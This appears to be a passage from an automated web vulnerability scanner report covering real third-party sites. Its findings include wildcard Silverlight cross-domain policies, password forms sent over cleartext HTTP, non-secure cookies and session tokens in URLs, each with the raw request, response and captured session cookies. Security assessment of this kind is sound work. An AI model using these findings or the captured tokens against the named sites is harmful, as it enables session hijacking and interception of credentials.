Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Fri, 24 Jun 2011 13:22:40 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
6.2. http://rcci.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcci.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rcci.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:05 GMT
Server: Omniture DC/2.0.0
xserver: www328
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.3. http://swsoft.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://swsoft.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: swsoft.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:11:01 GMT
Server: Omniture DC/2.0.0
xserver: www273
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.4. http://wotifcom.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wotifcom.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wotifcom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:41 GMT
Server: Omniture DC/2.0.0
xserver: www647
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
7. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

7.1. http://everquest2.com/free_to_play  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://everquest2.com
Path:   /free_to_play

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /free_to_play HTTP/1.1
Host: everquest2.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:14 GMT
Set-Cookie: locale=en; Domain=everquest2.com; Expires=Wed, 12-Jul-2079 16:44:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 26302

                       
                                                                                               <!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <META name="verify-v1" content="FAL4eTH1ff6uBoYCGOj7efgHT8x
...[SNIP]...
<div class="formarea">    <form id="preRegForm">
       <!--
       <div id="countryContainer">
...[SNIP]...
</label>
           <input type="password" name="stationPassword" id="stationPassword" class="textfield transparent validate[required,funcCall[mustContainANumber],length[6,15]]">
    <div class="clean">
...[SNIP]...
</label>
           <input type="password" name="stationConfirmPassword" id="stationConfirmPassword" class="textfield transparent validate[required,funcCall[validate2fields]]">
    <div class="clean">
...[SNIP]...
7.2. http://www.metlife.com/system/js/webforms/cta/signinmainjs.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /system/js/webforms/cta/signinmainjs.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /system/js/webforms/cta/signinmainjs.js HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:25 GMT
Server: IBM_HTTP_Server
Last-Modified: Sun, 17 Apr 2011 22:26:23 GMT
Content-Type: application/x-javascript
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:30:25 GMT
Vary: Accept-Encoding
Content-Length: 32444

var envURL = "";
var postURL;
var targetURL;
var newenvURL="";
var newenvURL1="";

function signInSelect(formName) {
   //alert(formName);
   var userSelect = document.getElementById("signinOption
...[SNIP]...
<body onLoad='javascript:document.getElementById(\"loginForm\").submit()'><form id='loginForm' action='" + mlURL + "' method='POST'>";
               mlFormhtml += "<div style='display:none'>
...[SNIP]...
<input type='text' id='USER' name='USER' value='" + esrvUserName + "'/>";
       eservFormhtml += "<input type='password' id='PASSWORD' name='PASSWORD' value='" + esrvPassword + "'/>";
       eservFormhtml += "<input type='hidden' name='SMENC' value='ISO-8859-1'/>
...[SNIP]...
7.3. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telkomsel.com
Path:   /product/blackberry/550-Paket-BlackBerry-Pilihan.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/blackberry/550-Paket-BlackBerry-Pilihan.html HTTP/1.1
Host: www.telkomsel.com
Proxy-Connection: keep-alive
Referer: http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fafdd737f01cf9ce82c539fcf7eb71a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221308921695%22%3Bs%3A8%3A%22language%22%3Bs%3A2%3A%22ID%22%3B%7D374344fdcb3fa1d5ac3d88c66037bbbb; PHPSESSID=4d70f11bd291a408d8bc49f1e6b3a975; __utmz=80575250.1308921411.1.1.utmcsr=beta.telkom.co.id|utmccn=(referral)|utmcmd=referral|utmcct=/rss/SimplePie/index.php; __utma=80575250.1631938963.1308921411.1308921411.1308921411.1; __utmc=80575250; __utmb=80575250.1.10.1308921411

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:22:40 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 101727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="signin_menu">
<form method="post" id="signin" action="http://www.telkomsel.com/loginmember">
<input id="username" name="username" class="tinput" value="msisdn number" title="username" tabindex="4" type="text" onclick="if(this.value=='msisdn number'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'msisdn number':this.value;" />
<input id="password" name="password" class="tinput" value="password" title="password" tabindex="5" type="password" onclick="if(this.value=='password'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'password':this.value;" />
<p class="remember">
...[SNIP]...
7.4. http://www.telkomsel.com/product/blackberry/undefined  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telkomsel.com
Path:   /product/blackberry/undefined

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/blackberry/undefined HTTP/1.1
Host: www.telkomsel.com
Proxy-Connection: keep-alive
Referer: http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fafdd737f01cf9ce82c539fcf7eb71a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221308921695%22%3Bs%3A8%3A%22language%22%3Bs%3A2%3A%22ID%22%3B%7D374344fdcb3fa1d5ac3d88c66037bbbb; PHPSESSID=4d70f11bd291a408d8bc49f1e6b3a975

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:21:55 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 96122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="signin_menu">
<form method="post" id="signin" action="http://www.telkomsel.com/loginmember">
<input id="username" name="username" class="tinput" value="msisdn number" title="username" tabindex="4" type="text" onclick="if(this.value=='msisdn number'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'msisdn number':this.value;" />
<input id="password" name="password" class="tinput" value="password" title="password" tabindex="5" type="password" onclick="if(this.value=='password'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'password':this.value;" />
<p class="remember">
...[SNIP]...
8. SSL cookie without secure flag set  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
9. Session token in URL  previous  next
There are 9 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

9.1. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=357&token=EHEX1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%0A2866%3B07%2F06%2F2011%3BSHME2; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 13:31:14 GMT; Path=/
Set-Cookie: cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2; Domain=.contextweb.com; Expires=Sat, 28-May-2016 13:31:14 GMT; Path=/
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:31:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
9.2. http://clicktoverify.truste.com/images/pos_btn3.png  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clicktoverify.truste.com
Path:   /images/pos_btn3.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/pos_btn3.png?PHPSESSID=b6a8c516419dafaa02e340bfd490167b HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://clicktoverify.truste.com/pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:49 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
Last-Modified: Thu, 25 Mar 2010 22:46:27 GMT
ETag: "81d072-1958-d12736c0"
Accept-Ranges: bytes
Content-Length: 6488
Content-Type: image/png

.PNG
.
...IHDR.............N..g...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
9.3. http://clicktoverify.truste.com/images/watch_btn3.png  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clicktoverify.truste.com
Path:   /images/watch_btn3.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/watch_btn3.png?PHPSESSID=b6a8c516419dafaa02e340bfd490167b HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://clicktoverify.truste.com/pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:49 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
Last-Modified: Thu, 25 Mar 2010 22:46:27 GMT
ETag: "81ce11-570-d12736c0"
Accept-Ranges: bytes
Content-Length: 1392
Content-Type: image/png

.PNG
.
...IHDR..............9'.....tEXtSoftware.Adobe ImageReadyq.e<....PLTETRP..b..:..R.....L...{.3........A..i..W........I........a..Y..^..z..W.....u..?.....6.._.....G..q.....?..S.....k..c..C.....
...[SNIP]...
9.4. http://clicktoverify.truste.com/pvr.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:46 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 12595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certi
...[SNIP]...
<div id="logo"><a href="//privacy-policy.truste.com/click-with-confidence/ctv/en/truste.com?PHPSESSID=445d5b109b4f42ef794f06203204708d" target="_blank"><img style="border: none" src="//privacy-policy.truste.com/certified-seal/ctv/en/truste.com/seal.png"/>
...[SNIP]...
9.5. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=dc48a90a-d71a-4495-be5f-fba64a291740&hostname=www.gamersdailynews.com&location=%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&sessionID=1308921999537.90164&fpc=383617f-130c1d4b0b1-2c952677-1&ts1308922028876.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; __uset=yes

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Fri, 24 Jun 2011 13:32:05 GMT
Connection: keep-alive

9.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.silobreaker.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174&callback=_xdc_._w047jh&token=16347 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Fri, 24 Jun 2011 13:31:48 GMT
Server: mafe
Cache-Control: private
Content-Length: 37
X-XSS-Protection: 1; mode=block

_xdc_._w047jh && _xdc_._w047jh( [1] )
9.7. https://softlayer.parallelsmarketplace.com/store/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
9.8. https://softlayer.parallelsmarketplace.com/store/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
